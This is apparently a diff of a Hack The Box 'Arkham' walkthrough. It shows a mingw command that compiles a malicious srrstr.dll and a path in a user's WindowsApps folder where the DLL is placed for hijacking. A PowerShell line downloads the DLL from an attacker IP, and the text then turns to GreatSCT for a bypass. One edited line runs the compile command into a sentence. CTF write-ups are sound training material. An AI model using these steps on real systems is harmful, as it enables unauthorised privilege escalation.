Kyuu-Ji/htb-write-up/arkham/write-up-arkham.md

 i686-w64-mingw32-g++ main.c -lws2_32 -o srrstr.dll -shared
 ```

+This creates DLL.
+I will call this main.c and put in into this repository.
+Compiling works like this:

-This created a DLL named _srrstr.dll_ and needs to get copied on the box in the path **C:\Users\Batman\appdata\local\microsoft\windowsapps**.
+i686-w64-mingw32-g++ main.c -lws2_32 -o srrstr.dll -shared a DLL named _srrstr.dll_ and needs to get copied on the box in the path **C:\Users\Batman\appdata\local\microsoft\windowsapps**.
 Download the file with Batman:
 ```markdown
 iwr -uri hxxp://10.10.13.112/srrstr.dll -outfile srrstr.dll
 ```

 #### Escalating to interactive session process

-To escalate to an interactive sessuion process we use the tool **GreatSCT**.
+To escalate to an interactive session process we use the tool **GreatSCT**.
 Installation can take some time.
 GreatSCT is a simple to use framework, where you have a menu to choose what you want to do by typing the number of the menu you want to be in.

 We will first choose the one Tool it has (Bypass):